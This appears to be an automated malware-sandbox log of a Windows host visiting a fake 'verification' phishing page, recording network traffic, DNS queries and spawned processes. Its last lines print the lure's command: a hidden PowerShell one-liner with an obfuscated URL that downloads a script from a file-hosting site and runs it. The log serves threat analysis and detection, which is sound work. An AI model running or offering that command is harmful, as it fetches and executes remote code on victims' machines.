Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1 host: otelrules.azureedge.net accept-encoding: gzip user-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1host: otelrules.azureedge.netaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /cj06ld.txt HTTP/1.1host: files.catbox.moeaccept: */*accept-encoding: identityif-unmodified-since: Tue, 27 May 2025 17:01:28 GMTuser-agent: Microsoft BITS/7.8
Source: global traffic DNS traffic detected: DNS query: confirm-id2719.click
Source: global traffic DNS traffic detected: DNS query: partner.booking.com
Source: global traffic DNS traffic detected: DNS query: bstatic.com
Source: global traffic DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic DNS traffic detected: DNS query: munchkin.marketo.net
Source: global traffic DNS traffic detected: DNS query: try.abtasty.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: files.catbox.moe
Source: unknown HTTP traffic detected: POST /antifraud HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveContent-Length: 0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Accept: */*Origin: https://confirm-id2719.clickSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.24.0 (Ubuntu)Date: Thu, 29 May 2025 13:20:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipContent-Length: 173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engine Classification label: mal84.phis.evad.win@29/11@23/214
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\BIT8664.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yirvsiyf.smg.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\svchost.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
